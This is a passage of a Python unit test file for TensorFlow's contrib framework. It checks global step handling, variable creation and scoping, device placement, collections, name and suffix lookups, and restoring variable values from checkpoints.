self.assertEquals('%s:0' % tf.GraphKeys.GLOBAL_STEP, global_step.name) self.assertEquals(expected_dtype, global_step.dtype.base_dtype) self.assertEquals([], global_step.get_shape().as_list()) def test_invalid_dtype(self): with tf.Graph().as_default() as g: self.assertEquals(None, tf.contrib.framework.get_global_step()) tf.Variable( 0.0, trainable=False, dtype=tf.float32, name=tf.GraphKeys.GLOBAL_STEP) self.assertRaisesRegexp( TypeError, 'does not have integer type', tf.contrib.framework.get_global_step) self.assertRaisesRegexp( TypeError, 'does not have integer type', tf.contrib.framework.get_global_step, g) def test_invalid_shape(self): with tf.Graph().as_default() as g: self.assertEquals(None, tf.contrib.framework.get_global_step()) tf.Variable( [0], trainable=False, dtype=tf.int32, name=tf.GraphKeys.GLOBAL_STEP) self.assertRaisesRegexp( TypeError, 'not scalar', tf.contrib.framework.get_global_step) self.assertRaisesRegexp( TypeError, 'not scalar', tf.contrib.framework.get_global_step, g) def test_create_global_step(self): self.assertEquals(None, tf.contrib.framework.get_global_step()) with tf.Graph().as_default() as g: global_step = tf.contrib.framework.create_global_step() self._assert_global_step(global_step) self.assertRaisesRegexp( ValueError, 'already exists', tf.contrib.framework.create_global_step) self.assertRaisesRegexp( ValueError, 'already exists', tf.contrib.framework.create_global_step, g) self._assert_global_step( tf.contrib.framework.create_global_step(tf.Graph())) def test_get_global_step(self): with tf.Graph().as_default() as g: self.assertEquals(None, tf.contrib.framework.get_global_step()) tf.Variable( 0, trainable=False, dtype=tf.int32, name=tf.GraphKeys.GLOBAL_STEP) self._assert_global_step( tf.contrib.framework.get_global_step(), expected_dtype=tf.int32) self._assert_global_step( tf.contrib.framework.get_global_step(g), expected_dtype=tf.int32) def test_get_or_create_global_step(self): with tf.Graph().as_default() as g: self.assertEquals(None, tf.contrib.framework.get_global_step()) self._assert_global_step( tf.contrib.framework.get_or_create_global_step()) self._assert_global_step( tf.contrib.framework.get_or_create_global_step(g)) class VariablesTest(tf.test.TestCase): def testCreateVariable(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) self.assertEquals(a.op.name, 'A/a') self.assertListEqual(a.get_shape().as_list(), [5]) self.assertTrue(a in tf.get_collection(tf.GraphKeys.VARIABLES)) self.assertFalse(a in tf.get_collection(tf.GraphKeys.MODEL_VARIABLES)) self.assertFalse(a in tf.local_variables()) def testGetVariables(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) with tf.variable_scope('B'): b = tf.contrib.framework.variable('a', [5]) self.assertEquals([a, b], tf.contrib.framework.get_variables()) self.assertEquals([a], tf.contrib.framework.get_variables('A')) self.assertEquals([b], tf.contrib.framework.get_variables('B')) def testGetVariablesSuffix(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) with tf.variable_scope('A'): b = tf.contrib.framework.variable('b', [5]) self.assertEquals([a], tf.contrib.framework.get_variables(suffix='a')) self.assertEquals([b], tf.contrib.framework.get_variables(suffix='b')) def testGetVariableWithSingleVar(self): with self.test_session(): with tf.variable_scope('parent'): a = tf.contrib.framework.variable('child', [5]) self.assertEquals( a, tf.contrib.framework.get_unique_variable('parent/child')) def testGetVariableWithDistractors(self): with self.test_session(): with tf.variable_scope('parent'): a = tf.contrib.framework.variable('child', [5]) with tf.variable_scope('child'): tf.contrib.framework.variable('grandchild1', [7]) tf.contrib.framework.variable('grandchild2', [9]) self.assertEquals( a, tf.contrib.framework.get_unique_variable('parent/child')) def testGetVariableThrowsExceptionWithNoMatch(self): var_name = 'cant_find_me' with self.test_session(): with self.assertRaises(ValueError): tf.contrib.framework.get_unique_variable(var_name) def testGetThrowsExceptionWithChildrenButNoMatch(self): var_name = 'parent/child' with self.test_session(): with tf.variable_scope(var_name): tf.contrib.framework.variable('grandchild1', [7]) tf.contrib.framework.variable('grandchild2', [9]) with self.assertRaises(ValueError): tf.contrib.framework.get_unique_variable(var_name) def testGetVariablesToRestore(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) with tf.variable_scope('B'): b = tf.contrib.framework.variable('a', [5]) self.assertEquals([a, b], tf.contrib.framework.get_variables_to_restore()) def testIncludeGetVariablesToRestore(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) with tf.variable_scope('B'): b = tf.contrib.framework.variable('a', [5]) self.assertEquals([a, b], tf.contrib.framework.get_variables()) self.assertEquals([a], tf.contrib.framework.get_variables_to_restore(['A'])) def testExcludeGetVariablesToRestore(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) with tf.variable_scope('B'): b = tf.contrib.framework.variable('a', [5]) self.assertEquals([a, b], tf.contrib.framework.get_variables()) self.assertEquals([a], tf.contrib.framework.get_variables_to_restore( exclude=['B'])) def testWrongIncludeGetVariablesToRestore(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) with tf.variable_scope('B'): b = tf.contrib.framework.variable('a', [5]) self.assertEquals([a, b], tf.contrib.framework.get_variables()) self.assertEquals([], tf.contrib.framework.get_variables_to_restore(['a'])) def testGetMixedVariablesToRestore(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) b = tf.contrib.framework.variable('b', [5]) with tf.variable_scope('B'): c = tf.contrib.framework.variable('c', [5]) d = tf.contrib.framework.variable('d', [5]) self.assertEquals([a, b, c, d], tf.contrib.framework.get_variables()) self.assertEquals([a, c], tf.contrib.framework.get_variables_to_restore( include=['A/a', 'B/c'])) def testExcludeGetMixedVariablesToRestore(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) b = tf.contrib.framework.variable('b', [5]) with tf.variable_scope('B'): c = tf.contrib.framework.variable('c', [5]) d = tf.contrib.framework.variable('d', [5]) self.assertEquals([a, b, c, d], tf.contrib.framework.get_variables()) self.assertEquals([b, d], tf.contrib.framework.get_variables_to_restore( exclude=['A/a', 'B/c'])) def testReuseVariable(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', []) with tf.variable_scope('A', reuse=True): b = tf.contrib.framework.variable('a', []) self.assertEquals(a, b) self.assertListEqual([a], tf.contrib.framework.get_variables()) def testVariableWithRegularizer(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [], regularizer=tf.nn.l2_loss) loss = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)[0] self.assertDeviceEqual(loss.device, a.device) def testVariableWithRegularizerColocate(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [], device='gpu:0', regularizer=tf.nn.l2_loss) loss = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)[0] self.assertDeviceEqual(loss.device, a.device) def testVariableWithDevice(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [], device='cpu:0') b = tf.contrib.framework.variable('b', [], device='cpu:1') self.assertDeviceEqual(a.device, 'cpu:0') self.assertDeviceEqual(b.device, 'cpu:1') def testVariableWithDeviceFromScope(self): with self.test_session(): with tf.device('/cpu:0'): a = tf.contrib.framework.variable('a', []) b = tf.contrib.framework.variable('b', [], device='cpu:1') self.assertDeviceEqual(a.device, 'cpu:0') self.assertDeviceEqual(b.device, 'cpu:1') def testVariableWithDeviceFunction(self): class DevFn(object): def __init__(self): self.counter = -1 def __call__(self, op): self.counter += 1 return 'cpu:%d' % self.counter with self.test_session(): with tf.contrib.framework.arg_scope([tf.contrib.framework.variable], device=DevFn()): a = tf.contrib.framework.variable('a', []) b = tf.contrib.framework.variable('b', []) c = tf.contrib.framework.variable('c', [], device='cpu:12') d = tf.contrib.framework.variable('d', []) with tf.device('cpu:99'): e_init = tf.constant(12) e = tf.contrib.framework.variable('e', initializer=e_init) self.assertDeviceEqual(a.device, 'cpu:0') self.assertDeviceEqual(a.initial_value.device, 'cpu:0') self.assertDeviceEqual(b.device, 'cpu:1') self.assertDeviceEqual(b.initial_value.device, 'cpu:1') self.assertDeviceEqual(c.device, 'cpu:12') self.assertDeviceEqual(c.initial_value.device, 'cpu:12') self.assertDeviceEqual(d.device, 'cpu:2') self.assertDeviceEqual(d.initial_value.device, 'cpu:2') self.assertDeviceEqual(e.device, 'cpu:3') self.assertDeviceEqual(e.initial_value.device, 'cpu:99') def testVariableWithReplicaDeviceSetter(self): with self.test_session(): with tf.device(tf.train.replica_device_setter(ps_tasks=2)): a = tf.contrib.framework.variable('a', []) b = tf.contrib.framework.variable('b', []) c = tf.contrib.framework.variable('c', [], device='cpu:12') d = tf.contrib.framework.variable('d', []) with tf.device('cpu:99'): e_init = tf.constant(12) e = tf.contrib.framework.variable('e', initializer=e_init) # The values below highlight how the replica_device_setter puts initial # values on the worker job, and how it merges explicit devices. self.assertDeviceEqual(a.device, '/job:ps/task:0/cpu:0') self.assertDeviceEqual(a.initial_value.device, a.device) self.assertDeviceEqual(b.device, '/job:ps/task:1/cpu:0') self.assertDeviceEqual(b.initial_value.device, b.device) self.assertDeviceEqual(c.device, '/job:ps/task:0/cpu:12') self.assertDeviceEqual(c.initial_value.device, c.device) self.assertDeviceEqual(d.device, '/job:ps/task:1/cpu:0') self.assertDeviceEqual(d.initial_value.device, d.device) self.assertDeviceEqual(e.device, '/job:ps/task:0/cpu:0') self.assertDeviceEqual(e.initial_value.device, '/job:worker/cpu:99') def testVariableWithVariableDeviceChooser(self): with tf.Graph().as_default(): device_fn = tf.contrib.framework.VariableDeviceChooser(num_tasks=2) with tf.contrib.framework.arg_scope([tf.contrib.framework.variable], device=device_fn): a = tf.contrib.framework.variable('a', []) b = tf.contrib.framework.variable('b', []) c = tf.contrib.framework.variable('c', [], device='cpu:12') d = tf.contrib.framework.variable('d', []) with tf.device('cpu:99'): e_init = tf.constant(12) e = tf.contrib.framework.variable('e', initializer=e_init) # The values below highlight how the VariableDeviceChooser puts initial # values on the same device as the variable job. self.assertDeviceEqual(a.device, '/job:ps/task:0/cpu:0') self.assertDeviceEqual(a.initial_value.device, a.device) self.assertDeviceEqual(b.device, '/job:ps/task:1/cpu:0') self.assertDeviceEqual(b.initial_value.device, b.device) self.assertDeviceEqual(c.device, '/cpu:12') self.assertDeviceEqual(c.initial_value.device, c.device) self.assertDeviceEqual(d.device, '/job:ps/task:0/cpu:0') self.assertDeviceEqual(d.initial_value.device, d.device) self.assertDeviceEqual(e.device, '/job:ps/task:1/cpu:0') self.assertDeviceEqual(e.initial_value.device, '/cpu:99') def testVariableGPUPlacement(self): with tf.Graph().as_default(): device_fn = tf.contrib.framework.VariableDeviceChooser(device_type='GPU') with tf.contrib.framework.arg_scope([tf.contrib.framework.variable], device=device_fn): a = tf.contrib.framework.variable('a', []) b = tf.contrib.framework.variable('b', []) c = tf.contrib.framework.variable('c', [], device='cpu:12') d = tf.contrib.framework.variable('d', []) with tf.device('cpu:99'): e_init = tf.constant(12) e = tf.contrib.framework.variable('e', initializer=e_init) # The values below highlight how the VariableDeviceChooser puts initial # values on the same device as the variable job. self.assertDeviceEqual(a.device, '/gpu:0') self.assertDeviceEqual(a.initial_value.device, a.device) self.assertDeviceEqual(b.device, '/gpu:0') self.assertDeviceEqual(b.initial_value.device, b.device) self.assertDeviceEqual(c.device, '/cpu:12') self.assertDeviceEqual(c.initial_value.device, c.device) self.assertDeviceEqual(d.device, '/gpu:0') self.assertDeviceEqual(d.initial_value.device, d.device) self.assertDeviceEqual(e.device, '/gpu:0') self.assertDeviceEqual(e.initial_value.device, '/cpu:99') class ModelVariablesTest(tf.test.TestCase): def testNameAndShape(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.model_variable('a', [5]) self.assertEquals(a.op.name, 'A/a') self.assertListEqual(a.get_shape().as_list(), [5]) self.assertListEqual([a], tf.contrib.framework.get_model_variables('A')) def testNotInLocalVariables(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.model_variable('a', [5]) self.assertTrue(a in tf.all_variables()) self.assertTrue(a in tf.get_collection(tf.GraphKeys.MODEL_VARIABLES)) self.assertFalse(a in tf.local_variables()) def testGetVariablesReturns(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.model_variable('a', [5]) with tf.variable_scope('B'): b = tf.contrib.framework.model_variable('a', [5]) self.assertEquals([a], tf.contrib.framework.get_variables('A')) self.assertEquals([b], tf.contrib.framework.get_variables('B')) def testGetModelVariables(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.model_variable('a', [5]) with tf.variable_scope('B'): b = tf.contrib.framework.model_variable('a', [5]) self.assertEquals([a], tf.contrib.framework.get_model_variables('A')) self.assertEquals([b], tf.contrib.framework.get_model_variables('B')) def testGetLocalVariables(self): with self.test_session(): with tf.variable_scope('A'): _ = tf.contrib.framework.model_variable('a', [5]) with tf.variable_scope('B'): _ = tf.contrib.framework.model_variable('a', [5]) self.assertEquals([], tf.contrib.framework.get_local_variables('A')) self.assertEquals([], tf.contrib.framework.get_local_variables('B')) def testInitializedVariableValue(self): with self.test_session() as sess: a = tf.contrib.framework.model_variable( 'a', [5], initializer=tf.ones_initializer) sess.run(tf.initialize_all_variables()) self.assertAllEqual(a.eval(), [1]*5) def testDeviceFn(self): class DevFn(object): def __init__(self): self.counter = -1 def __call__(self, op): self.counter += 1 return '/cpu:%d' % self.counter with tf.Graph().as_default(): with tf.contrib.framework.arg_scope([tf.contrib.framework.model_variable], device=DevFn()): a = tf.contrib.framework.model_variable('a', [5]) b = tf.contrib.framework.model_variable('b', [20]) self.assertDeviceEqual(a.device, '/cpu:0') self.assertDeviceEqual(a.initial_value.device, '/cpu:0') self.assertDeviceEqual(b.device, '/cpu:1') self.assertDeviceEqual(b.initial_value.device, '/cpu:1') def testVariableWithVariableDeviceChooser(self): with tf.Graph().as_default(): device_fn = tf.contrib.framework.VariableDeviceChooser() with tf.contrib.framework.arg_scope([tf.contrib.framework.model_variable], device=device_fn): a = tf.contrib.framework.model_variable('a', [5]) b = tf.contrib.framework.model_variable('b', [20]) self.assertDeviceEqual(a.device, 'cpu:0') self.assertDeviceEqual(a.initial_value.device, a.device) self.assertDeviceEqual(b.device, 'cpu:0') self.assertDeviceEqual(b.initial_value.device, b.device) class GetVariablesCollections(tf.test.TestCase): def testVariableCollection(self): with self.test_session(): a = tf.contrib.framework.variable('a', [], collections='A') b = tf.contrib.framework.variable('b', [], collections='B') self.assertEquals(a, tf.get_collection('A')[0]) self.assertEquals(b, tf.get_collection('B')[0]) def testVariableCollections(self): with self.test_session(): a = tf.contrib.framework.variable('a', [], collections=['A', 'C']) b = tf.contrib.framework.variable('b', [], collections=['B', 'C']) self.assertEquals(a, tf.get_collection('A')[0]) self.assertEquals(b, tf.get_collection('B')[0]) self.assertListEqual([a, b], tf.get_collection('C')) def testVariableCollectionsWithArgScope(self): with self.test_session(): with tf.contrib.framework.arg_scope([tf.contrib.framework.variable], collections='A'): a = tf.contrib.framework.variable('a', []) b = tf.contrib.framework.variable('b', []) self.assertListEqual([a, b], tf.get_collection('A')) def testVariableCollectionsWithArgScopeNested(self): with self.test_session(): with tf.contrib.framework.arg_scope([tf.contrib.framework.variable], collections='A'): a = tf.contrib.framework.variable('a', []) with tf.contrib.framework.arg_scope([tf.contrib.framework.variable], collections='B'): b = tf.contrib.framework.variable('b', []) self.assertEquals(a, tf.get_collection('A')[0]) self.assertEquals(b, tf.get_collection('B')[0]) def testVariableCollectionsWithArgScopeNonNested(self): with self.test_session(): with tf.contrib.framework.arg_scope([tf.contrib.framework.variable], collections='A'): a = tf.contrib.framework.variable('a', []) with tf.contrib.framework.arg_scope([tf.contrib.framework.variable], collections='B'): b = tf.contrib.framework.variable('b', []) tf.contrib.framework.variable('c', []) self.assertListEqual([a], tf.get_collection('A')) self.assertListEqual([b], tf.get_collection('B')) def testVariableRestoreWithArgScopeNested(self): with self.test_session(): a = tf.contrib.framework.variable('a', []) with tf.contrib.framework.arg_scope([tf.contrib.framework.variable], trainable=False, collections=['A', 'B']): b = tf.contrib.framework.variable('b', []) c = tf.contrib.framework.variable('c', [], trainable=False) self.assertEquals([a, c], tf.contrib.framework.get_variables_to_restore()) self.assertEquals([a], tf.trainable_variables()) self.assertEquals([b], tf.get_collection('A')) self.assertEquals([b], tf.get_collection('B')) class GetVariablesBySuffixTest(tf.test.TestCase): def testGetVariableGivenNameScoped(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) b = tf.contrib.framework.variable('b', [5]) self.assertEquals([a], tf.contrib.framework.get_variables_by_suffix('a')) self.assertEquals([b], tf.contrib.framework.get_variables_by_suffix('b')) def testGetVariableWithScope(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) fooa = tf.contrib.framework.variable('fooa', [5]) with tf.variable_scope('B'): a2 = tf.contrib.framework.variable('a', [5]) matched_variables = tf.contrib.framework.get_variables_by_suffix('a') self.assertEquals([a, fooa, a2], matched_variables) matched_variables = tf.contrib.framework.get_variables_by_suffix('/a') self.assertEquals([a, a2], matched_variables) matched_variables = tf.contrib.framework.get_variables_by_suffix( 'a', scope='A') self.assertEquals([a, fooa], matched_variables) def testGetVariableWithoutScope(self): with self.test_session(): a = tf.contrib.framework.variable('a', [5]) fooa = tf.contrib.framework.variable('fooa', [5]) b_a = tf.contrib.framework.variable('B/a', [5]) matched_variables = tf.contrib.framework.get_variables_by_suffix('a') self.assertEquals([a, fooa, b_a], matched_variables) matched_variables = tf.contrib.framework.get_variables_by_suffix('fooa') self.assertEquals([fooa], matched_variables) class GetVariablesByNameTest(tf.test.TestCase): def testGetVariableGivenNameScoped(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) b = tf.contrib.framework.variable('b', [5]) self.assertEquals([a], tf.contrib.framework.get_variables_by_name('a')) self.assertEquals([b], tf.contrib.framework.get_variables_by_name('b')) def testGetVariableWithScope(self): with self.test_session(): with tf.variable_scope('A'): a = tf.contrib.framework.variable('a', [5]) fooa = tf.contrib.framework.variable('fooa', [5]) with tf.variable_scope('B'): a2 = tf.contrib.framework.variable('a', [5]) matched_variables = tf.contrib.framework.get_variables_by_name('a') self.assertEquals([a, a2], matched_variables) matched_variables = tf.contrib.framework.get_variables_by_name('fooa') self.assertEquals([fooa], matched_variables) matched_variables = tf.contrib.framework.get_variables_by_name('/a') self.assertEquals([], matched_variables) matched_variables = tf.contrib.framework.get_variables_by_name('a', scope='A') self.assertEquals([a], matched_variables) def testGetVariableWithoutScope(self): with self.test_session(): a = tf.contrib.framework.variable('a', [5]) fooa = tf.contrib.framework.variable('fooa', [5]) b_a = tf.contrib.framework.variable('B/a', [5]) matched_variables = tf.contrib.framework.get_variables_by_name('a') self.assertEquals([a, b_a], matched_variables) matched_variables = tf.contrib.framework.get_variables_by_name('fooa') self.assertEquals([fooa], matched_variables) class AssignFromValuesTest(tf.test.TestCase): def testNoScopes(self): init_value0 = np.asarray([1.0, 3.0, 9.0]).reshape((1, 3, 1)) init_value1 = np.asarray([2.0, 4.0, 6.0, 8.0]).reshape((2, 1, 2)) with self.test_session() as sess: initializer = tf.truncated_normal_initializer(stddev=.1) var0 = tf.contrib.framework.variables.variable( 'my_var0', shape=[1, 3, 1], initializer=initializer) var1 = tf.contrib.framework.variables.variable( 'my_var1', shape=[2, 1, 2], initializer=initializer) var_names_to_values = {'my_var0': init_value0, 'my_var1': init_value1} assign_op, feed_dict = tf.contrib.framework.variables.assign_from_values( var_names_to_values) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. sess.run(assign_op, feed_dict) # Request and test the variable values: var0, var1 = sess.run([var0, var1]) self.assertAllEqual(init_value0, var0) self.assertAllEqual(init_value1, var1) def testWithScopes(self): init_value0 = np.asarray([1.0, 3.0, 9.0]).reshape((1, 3, 1)) init_value1 = np.asarray([2.0, 4.0, 6.0, 8.0]).reshape((2, 1, 2)) with self.test_session() as sess: initializer = tf.truncated_normal_initializer(stddev=.1) with tf.variable_scope('my_model/my_layer0'): var0 = tf.contrib.framework.variables.variable( 'my_var0', shape=[1, 3, 1], initializer=initializer) with tf.variable_scope('my_model/my_layer1'): var1 = tf.contrib.framework.variables.variable( 'my_var1', shape=[2, 1, 2], initializer=initializer) var_names_to_values = {'my_model/my_layer0/my_var0': init_value0, 'my_model/my_layer1/my_var1': init_value1} assign_op, feed_dict = tf.contrib.framework.variables.assign_from_values( var_names_to_values) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. sess.run(assign_op, feed_dict) # Request and test the variable values: var0, var1 = sess.run([var0, var1]) self.assertAllEqual(init_value0, var0) self.assertAllEqual(init_value1, var1) class AssignFromValuesFnTest(tf.test.TestCase): def testNoScopes(self): init_value0 = np.asarray([1.0, 3.0, 9.0]).reshape((1, 3, 1)) init_value1 = np.asarray([2.0, 4.0, 6.0, 8.0]).reshape((2, 1, 2)) with self.test_session() as sess: initializer = tf.truncated_normal_initializer(stddev=.1) var0 = tf.contrib.framework.variable( 'my_var0', shape=[1, 3, 1], initializer=initializer) var1 = tf.contrib.framework.variable( 'my_var1', shape=[2, 1, 2], initializer=initializer) var_names_to_values = {'my_var0': init_value0, 'my_var1': init_value1} init_fn = tf.contrib.framework.assign_from_values_fn(var_names_to_values) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. init_fn(sess) # Request and test the variable values: var0, var1 = sess.run([var0, var1]) self.assertAllEqual(init_value0, var0) self.assertAllEqual(init_value1, var1) def testWithScopes(self): init_value0 = np.asarray([1.0, 3.0, 9.0]).reshape((1, 3, 1)) init_value1 = np.asarray([2.0, 4.0, 6.0, 8.0]).reshape((2, 1, 2)) with self.test_session() as sess: initializer = tf.truncated_normal_initializer(stddev=.1) with tf.variable_scope('my_model/my_layer0'): var0 = tf.contrib.framework.variable( 'my_var0', shape=[1, 3, 1], initializer=initializer) with tf.variable_scope('my_model/my_layer1'): var1 = tf.contrib.framework.variable( 'my_var1', shape=[2, 1, 2], initializer=initializer) var_names_to_values = {'my_model/my_layer0/my_var0': init_value0, 'my_model/my_layer1/my_var1': init_value1} init_fn = tf.contrib.framework.assign_from_values_fn(var_names_to_values) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. init_fn(sess) # Request and test the variable values: var0, var1 = sess.run([var0, var1]) self.assertAllEqual(init_value0, var0) self.assertAllEqual(init_value1, var1) class AssignFromCheckpointTest(tf.test.TestCase): def create_checkpoint_from_values(self, var_names_to_values, checkpoint_dir, global_step=None): """Creates a checkpoint from a mapping of name to values in model_dir. Args: var_names_to_values: a map from variable names to values. checkpoint_dir: the directory where the checkpoint will be saved. global_step: the global step used to save the checkpoint. Returns: the model_path to the checkpoint. """ var_list = [] with tf.Session('', graph=tf.Graph()) as sess: # Create a set of variables to save in the checkpoint. for var_name in var_names_to_values: var_value = var_names_to_values[var_name] var_list.append(tf.Variable(var_value, name=var_name)) saver = tf.train.Saver(var_list) init_op = tf.initialize_variables(var_list) sess.run(init_op) # Save the initialized values in the file at 'checkpoint_dir' return saver.save(sess, checkpoint_dir, global_step=global_step) def testLoadExistingVariables(self): init_value0 = 10.0 init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variables.variable('my_var0', shape=[]) var1 = tf.contrib.framework.variables.variable('my_var1', shape=[]) vars_to_restore = {'v0': var0, 'v1': var1} op, feed_dict = tf.contrib.framework.variables.assign_from_checkpoint( model_path, vars_to_restore) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. sess.run(op, feed_dict) # Request and test the variable values: self.assertEqual(init_value0, var0.eval()) self.assertEqual(init_value1, var1.eval()) def testRaisesValueErrorIfAVariableIsntFound(self): init_value0 = 10.0 init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session(): model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variables.variable('my_var0', shape=[]) var1 = tf.contrib.framework.variables.variable('my_var1', shape=[]) vars_to_restore = {'v0_fake': var0, 'v1': var1} with self.assertRaises(ValueError): tf.contrib.framework.variables.assign_from_checkpoint(model_path, vars_to_restore) def testInitFromCheckpointWithScopes(self): init_value0 = np.asarray([1.0, 3.0, 9.0], dtype=np.float32).reshape((1, 3, 1)) init_value1 = np.asarray([2.0, 4.0, 6.0, 8.0], dtype=np.float32).reshape((2, 1, 2)) var_names_to_values = {'layer0/v0': init_value0, 'layer1/v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) with tf.variable_scope('my_model/my_layer0'): var0 = tf.contrib.framework.variables.variable('my_var0', shape=init_value0.shape) with tf.variable_scope('my_model/my_layer1'): var1 = tf.contrib.framework.variables.variable('my_var1', shape=init_value1.shape) vars_to_restore = {'layer0/v0': var0, 'layer1/v1': var1} op, feed_dict = tf.contrib.framework.variables.assign_from_checkpoint( model_path, vars_to_restore) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. sess.run(op, feed_dict) # Request and test the variable values: self.assertAllEqual(init_value0, var0.eval()) self.assertAllEqual(init_value1, var1.eval()) class AssignFromCheckpointFnTest(tf.test.TestCase): def create_checkpoint_from_values(self, var_names_to_values, checkpoint_dir, global_step=None): """Creates a checkpoint from a mapping of name to values in model_dir. Args: var_names_to_values: a map from variable names to values. checkpoint_dir: the directory where the checkpoint will be saved. global_step: the global step used to save the checkpoint. Returns: the model_path to the checkpoint. """ var_list = [] with tf.Session('', graph=tf.Graph()) as sess: # Create a set of variables to save in the checkpoint. for var_name in var_names_to_values: var_value = var_names_to_values[var_name] var_list.append(tf.Variable(var_value, name=var_name)) saver = tf.train.Saver(var_list) init_op = tf.initialize_variables(var_list) sess.run(init_op) # Save the initialized values in the file at 'checkpoint_dir' return saver.save(sess, checkpoint_dir, global_step=global_step) def testLoadExistingVariables(self): init_value0 = 10.0 init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('my_var0', shape=[]) var1 = tf.contrib.framework.variable('my_var1', shape=[]) vars_to_restore = {'v0': var0, 'v1': var1} init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. init_fn(sess) # Request and test the variable values: self.assertEqual(init_value0, var0.eval()) self.assertEqual(init_value1, var1.eval()) def testLoadExistingVariablesDifferentShapeDefaultDoesNotAllowReshape(self): init_value0 = [[10.0, 11.0]] init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('my_var0', shape=[2, 1]) var1 = tf.contrib.framework.variable('my_var1', shape=[]) vars_to_restore = {'v0': var0, 'v1': var1} init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. with self.assertRaises(tf.errors.InvalidArgumentError): init_fn(sess) def testLoadExistingVariablesDifferentShapeAllowReshape(self): init_value0 = [[10.0, 11.0]] init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('my_var0', shape=[2, 1]) var1 = tf.contrib.framework.variable('my_var1', shape=[]) vars_to_restore = {'v0': var0, 'v1': var1} init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore, reshape_variables=True) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. init_fn(sess) # Request and test the variable values: self.assertAllEqual(np.transpose(np.array(init_value0)), var0.eval()) self.assertEqual(init_value1, var1.eval()) def testNotFoundError(self): init_value0 = 10.0 init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('my_var0', shape=[]) var1 = tf.contrib.framework.variable('my_var1', shape=[]) var2 = tf.contrib.framework.variable('my_var2', shape=[]) vars_to_restore = {'v0': var0, 'v1': var1, 'v2': var2} init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. with self.assertRaises(tf.errors.NotFoundError): init_fn(sess) def testMissingVariablesList(self): init_value0 = 10.0 init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('v0', shape=[]) var1 = tf.contrib.framework.variable('v1', shape=[]) var2 = tf.contrib.framework.variable('v2', shape=[]) vars_to_restore = [var0, var1, var2] init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore, ignore_missing_vars=True) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. init_fn(sess) # Request and test the variable values: self.assertEqual(init_value0, var0.eval()) self.assertEqual(init_value1, var1.eval()) def 